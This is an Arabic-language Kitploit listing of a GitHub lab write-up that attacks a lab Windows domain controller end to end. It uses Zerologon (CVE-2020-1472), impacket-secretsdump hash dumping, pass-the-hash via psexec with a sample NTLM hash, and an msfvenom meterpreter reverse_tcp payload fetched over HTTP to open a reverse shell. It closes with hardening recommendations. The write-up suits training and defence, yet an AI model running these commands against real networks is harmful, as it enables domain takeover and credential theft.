Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Domain-Controller-DC-Exploitation-with-Metasploit-Impacket — استغلال وحدة تحكم المجال من البداية إلى النهاية باستخدام Metasploit وImpacket: اكتشاف DC10، واستغلال ثغرة Zerologon (CVE-2020-1472)، واستخراج هاشات NTLM، والحصول على صلاحيات SYSTEM، وإنشاء جلسة Meterpreter. | Kitploit
أدوات/GitHubGitHub/nyambiblaise/domain-controller-dc-exploitation-with-metasploit-impacket
الاستطلاعأطر الاستغلالتوليد الحمولةتحليل الثغرات الأمنيةالحركة الجانبيةما بعد الاستغلالاختبار الاختراقالتعلم والتعليممختبرات وتدريب عملي

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
GitHubnyambiblaise/domain-controller-dc-exploitation-with-metasploit-impacket

Domain-Controller-DC-Exploitation-with-Metasploit-Impacket

استغلال وحدة تحكم المجال من البداية إلى النهاية باستخدام Metasploit وImpacket: اكتشاف DC10، واستغلال ثغرة Zerologon (CVE-2020-1472)، واستخراج هاشات NTLM، والحصول على صلاحيات SYSTEM، وإنشاء جلسة Meterpreter.

عرض المستودع
5منذ 10 أشهرلم تتم المراجعة بعد

استغلال وحدة تحكم المجال (DC) باستخدام Metasploit و Impacket

استغلال شامل لوحدة تحكم المجال من البداية إلى النهاية باستخدام Metasploit و Impacket: اكتشاف DC10، واستغلال ثغرة Zerologon (CVE-2020-1472)، واستخراج تجزئات NTLM، والحصول على شل SYSTEM، وإنشاء جلسة Meterpreter.

الملخص التنفيذي يوضح هذا التمرين سلسلة هجوم كاملة وواقعية ضد وحدة تحكم مجال كانت معرّضة لثغرة CVE-2020-1472 (Zerologon). شملت المهمة الاكتشاف، وإثراء الخدمات، والاستغلال، واستخراج بيانات الاعتماد، والحركة الجانبية، والتحقق من مرحلة ما بعد الاستغلال. نجحت في الحصول على وصول بمستوى SYSTEM وإنشاء جلسة Meterpreter مستقرة على DC باستخدام مزيج من Zerologon و Impacket secretsdump + pass-the-hash وحمولات msfvenom/meterpreter. تم التقاط لقطات شاشة وأدلة أوامر في كل مرحلة كأدلة إثبات.

نظرة عامة على المختبر: محاكاة سلسلة هجوم كاملة على وحدة تحكم مجال Windows باستخدام Metasploit و Impacket؛ الاكتشاف، و Zerologon، و secretsdump، و pass-the-hash، وجلسة Meterpreter خاضعة للتحكم.

لماذا يهم هذا المؤسسات: نظرًا لأن DC يتحكم في المصادقة وسياسات المجموعة والهوية للمجال بأكمله، فإن أي اختراق يمكن أن يتصاعد إلى تعطيل كامل للأعمال، والاستيلاء على الحسابات، وسرقة البيانات، ونشر برامج الفدية، وفقدان الثقة التنظيمية. حماية وحدات التحكم بالمجال (DCs) تحافظ على استمرارية التشغيل والإيرادات والسمعة من خلال منع المهاجمين من تحويل الهوية إلى نقطة فشل واحدة.

استغلال وحدة تحكم المجال (DC) باستخدام Metasploit + Impacket

السيناريو

سيتم تزويدك بجهازين في شبكة مختبر معزولة. أحد النظامين هو وحدة تحكم مجال Windows (DC) تُدعى DC10 تستضيف خدمات Active Directory الأساسية. النظام الآخر هو محطة عمل Kali موضوعة في نفس الشبكة الفرعية للخادم لأغراض الاختبار. يُفترض أن تكشف DC عن خدمات المجال النموذجية (على سبيل المثال، LDAP و Kerberos و SMB) وقد تكون معرّضة لمشكلات معروفة. يُتوقع استخدام مضيف Kali للاستطلاع والاستغلال والوصول إلى بيانات الاعتماد والحركة الجانبية والتحقق من مرحلة ما بعد الاستغلال. المهمة هي تحديد DC، وتأكيد تفاصيل المجال، والحصول على موطئ قدم أولي باستخدام تقنية مناسبة، واستخراج مواد بيانات الاعتماد لتمكين الوصول الإداري، ثم إظهار السيطرة على DC من خلال شل بعيد وجلسة وكيل مُدارة، مع التكيف مع أي قيود بيئية مثل الخدمات المُصححة، أو تقييد الاتصال الصادر، أو دفاعات نقطة النهاية. DC: 10.1.16.1 Kali: 10.1.16.66

النتائج الرئيسية

  • ثغرة حرجة تم استغلالها: تم استغلال CVE-2020-1472 (Zerologon) بنجاح لإعادة تعيين كلمة مرور حساب جهاز DC إلى فارغة.
  • اختراق بيانات الاعتماد: تم استخراج تجزئات NTLM من DC (عبر secretsdump)، مما كشف عن بيانات اعتماد المسؤول التي مكّنت من pass-the-hash.
  • إثبات السيطرة الكاملة على المجال: باستخدام التجزئات المستخرجة، تم الحصول على شل SYSTEM على DC10 (عبر psexec)، وتشغيل شل عكسي مستقر بـ Meterpreter، مما يؤكد تنفيذ التعليمات البرمجية عن بُعد والاستمرارية.
  • الخدمات المكشوفة: كانت خدمات LDAP و Kerberos و SMB وخدمات RPC ذات الصلة قابلة للوصول من المضيف المهاجم، مما مكّن من الاكتشاف والاستغلال.
  • مخاطر سطح الهجوم: قبلت DC عمليات عن بُعد سمحت بالتلاعب بحساب الجهاز وتنفيذ الحمولات عن بُعد.

1) الاكتشاف وتحديد النطاق

استخدمت msfconsole مع دعم قاعدة البيانات، ونفّذت مسحًا شاملاً بـ nmap من داخل MSF، واستوردت النتائج، ونقّحت المضيفين والخدمات لتأكيد تعرض DC10.

  • شغّلت msfconsole مع دعم قاعدة البيانات وأكدت الاتصال بقاعدة البيانات.
  • نفّذت مسح nmap عبر الشبكة الفرعية من msfconsole واستوردت النتائج إلى قاعدة بيانات MSF.
  • نظّفت جدول المضيفين لإزالة عنوان Kali الخاص بي. راجعت الخدمات لتحديد مؤشرات DC المحتملة.
  • استخدمت ماسح منافذ SYN في MSF مع نطاق منافذ مقيد وخيوط معالجة عامة لتحسين بيانات الخدمات.
  • نفّذت بصمة SMB على مضيفي Windows لإثراء تفاصيل نظام التشغيل.
  • أكدت خدمات LDAP و Kerberos على 10.1.16.1 وتحققّت من اسم المجال عبر استعلام LDAP.
  • القرار: التعامل مع 10.1.16.1 كهدف DC للاستغلال والوصول إلى بيانات الاعتماد.
صورة صورة صورة

2) إثراء الخدمات وتأكيد DC

نفّذت مسحًا لمنافذ SYN في MSF، وبصمت SMB، وأكدت خدمات LDAP و Kerberos على 10.1.16.1. استعلمت من LDAP لاسترجاع اسم المجال.

صورة صورة صورة صورة صورة ### فحص إصدار SMB
  • استخدمت وحدة إصدار SMB في msfconsole: auxiliary/scanner/smb/smb_version.
  • عيّنت الأهداف من جدول المضيفين باستخدام hosts -R.
  • حصلت على تفاصيل SMB dialect ونظام التشغيل.
  • النتيجة: أظهر 10.1.16.1 معلومات Windows Server، وهو ما يتوافق مع كونه وحدة تحكم المجال.
صورة صورة صورة صورة صورة

استعلام LDAP

  • بالنسبة لوحدة استعلام LDAP، استخدمت auxiliary/gather/ldap_query.
  • ضبط rhosts إلى 10.1.16.1 لاستهداف DC10 مباشرة.
  • شغّلته لجلب معلومات الدليل الأساسية.
  • النتيجة: تأكيد اسم المجال كـ “structureality” وأن LDAP على DC كان يستجيب.
صورة صورة صورة صورة

3) استغلال Zerologon (الوصول الأولي)

شغّلت auxiliary/admin/dcerpc/cve_2020_1472_zerologon ضد DC10 لإعادة تعيين كلمة مرور حساب الجهاز إلى فارغة.

صورة صورة

4) الوصول إلى بيانات الاعتماد (secretsdump)

باستخدام Impacket، قمت بتفريغ تجزئات NTLM من DC وحددت بيانات اعتماد المسؤول لاستخدامها في pass-the-hash.

impacket-secretsdump -just-dc-ntlm structureality/dc10\[email protected]

صورة صورة

5) الحركة الجانبية (psexec)

استخدمت pass-the-hash مع psexec للحصول على شل بمستوى SYSTEM على DC10 والتحقق من هوية المضيف.

impacket-psexec structureality/[email protected] -hashes aad3b435b51404eeaad3b435b51404ee:dae57d78fec919471799ce0fae8236b9 كما ترى، أنا بالفعل داخل C:\Windows\system32

صورة صورة

6) مرحلة ما بعد الاستغلال (Meterpreter)

أنشأت حمولة meterpreter من نوع reverse_tcp، واستضفتها عبر HTTP، ونزّلتها إلى DC10، وشغّلت handler، ونفّذت الحمولة لفتح جلسة Meterpreter.

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.1.16.66 LPORT=4567 -f exe -o secretfile.exe

صورة صورة شغّلت خادم ويب بسيطًا للسماح للنظام المستهدف بالوصول بسهولة إلى هذا الملف التنفيذي لـ meterpreter باستخدام:

python3 -m http.server 8080

صورة على الجهاز المستهدف، نفّذت الملف التنفيذي لـ meterpreter (secret.exe) صورة صورة صورة صورة صورة

كما ترى، أنشأت الآن اتصال شل عكسي بين DC10 المستهدف ونظام Kali. تم تحقيق ذلك باستخدام استغلالات خارجية/عن بُعد فقط ضد الهدف الضعيف.

بينما يقع نظام Kali في الشبكة الفرعية للخادم بجوار هدف DC10، هذه الأنواع من الهجمات ممكنة عبر الإنترنت إذا كان النظام المستهدف مكشوفًا على الإنترنت المفتوح.

7) النتائج المحققة

  • تم تحديد DC10 كوحدة تحكم مجال لـ structureality
  • نجح Zerologon، مما مكّن من استخراج بيانات الاعتماد
  • استخدام تجزئة المسؤول للحصول على شل SYSTEM عبر pass-the-hash
  • تأكيد جلسة Meterpreter مستقرة على DC10

الأدلة

  • سجلات قاعدة بيانات MSF ومسح nmap للشبكة الفرعية التي تؤكد اكتشاف المضيف/الخدمات.
  • مخرجات تعداد SMB/LDAP/Kerberos التي تؤكد خدمات DC واسم المجال structureality.
  • مخرجات وحدة Zerologon التي تُظهر إعادة تعيين كلمة مرور حساب الجهاز إلى فارغة.
  • مخرجات secretsdump مع تجزئات NTLM المستخرجة.
  • سجلات جلسة psexec التي تُظهر C:\Windows\System32.
  • لقطات شاشة لجلسات msfvenom و Meterpreter تؤكد التحكم عن بُعد.

الإجراءات المنفذة (ملخص)

  • الاكتشاف وتحديد النطاق: مسوحات nmap من msfconsole؛ استخدام قاعدة بيانات MSF لإدارة المضيفين/الخدمات؛ تأكيد DC10 كهدف.
  • إثراء الخدمات: بصمة SMB، واستعلامات LDAP، وتأكيد Kerberos للتحقق من دور وحدة تحكم المجال.
  • الوصول الأولي: تشغيل auxiliary/admin/dcerpc/cve_2020_1472_zerologon لإعادة تعيين كلمة مرور حساب جهاز DC.
  • الوصول إلى بيانات الاعتماد: استخدام impacket-secretsdump لاستخراج تجزئات NTLM من DC.
  • الحركة الجانبية: استخدام impacket-psexec مع تجزئة NTLM للمسؤول → شل SYSTEM.
  • مرحلة ما بعد الاستغلال: بناء واستضافة حمولة meterpreter (msfvenom)، وتنزيلها وتنفيذها على DC، وتأكيد جلسة مستمرة.

التوصيات لأصحاب الشبكة

  • تصحيح ثغرة Netlogon فورًا والتحقق من ذلك عبر مسح للتعرض لـ CVE-2020-1472
  • فرض توقيع SMB وتقييد تعرض DC لخدمتي SMB و RPC على الشبكات الفرعية الإدارية الموثوقة فقط
  • تنفيذ نموذج إداري متدرج ومنع تنفيذ الخدمات عن بُعد من مضيفي الإدارة غير الإداريين
  • تعطيل NTLM أو التحكم فيه بإحكام، وتفضيل Kerberos، ومراقبة أنماط pass-the-hash
  • التحكم في الاتصال الصادر: تقييد الاتصالات الصادرة من الخوادم، والسماح فقط بالوجهات والمنافذ المطلوبة
  • حماية نقطة النهاية: حظر الملفات الثنائية غير الموقعة وتطبيق فحص مدمج مع AMSI على PowerShell
  • المراقبة: التنبيه عند إعادة تعيين كلمات مرور حسابات الأجهزة، والوصول غير المعتاد إلى DRSUAPI، والمستمعات غير المتوقعة المشابهة للـ handlers
  • تدوير بيانات الاعتماد المميزة بانتظام واستخدام حلول LAPS أو PAM لتقليل مخاطر إعادة استخدام التجزئات
تنزيل الأداة